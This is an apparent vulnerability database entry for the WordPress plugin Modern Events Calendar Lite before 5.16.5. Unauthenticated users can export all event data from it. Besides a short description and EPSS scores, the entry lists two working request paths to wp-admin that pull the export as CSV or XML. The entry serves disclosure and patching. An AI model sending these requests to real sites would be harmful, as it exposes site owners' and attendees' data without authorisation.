Lucene search

K
wpexploitKhanhWPEX-ID:C7B1EBD6-3050-4725-9C87-0EA525F8FECC
HistoryJan 29, 2021 - 12:00 a.m.

Modern Events Calendar Lite < 5.16.5 - Unauthenticated Events Export

2021-01-2900:00:00
khanh
311

0.026 Low

EPSS

Percentile

90.4%

The plugin did not properly restrict access to the export files, allowing unauthenticated users to exports all events data in CSV or XML format for example.

https://drive.google.com/file/d/1lLEXDyPp4LcKoCOqYS7A-0Yg_pIQD-ND/view?usp=sharing

/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv
/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=xml

0.026 Low

EPSS

Percentile

90.4%

Related for WPEX-ID:C7B1EBD6-3050-4725-9C87-0EA525F8FECC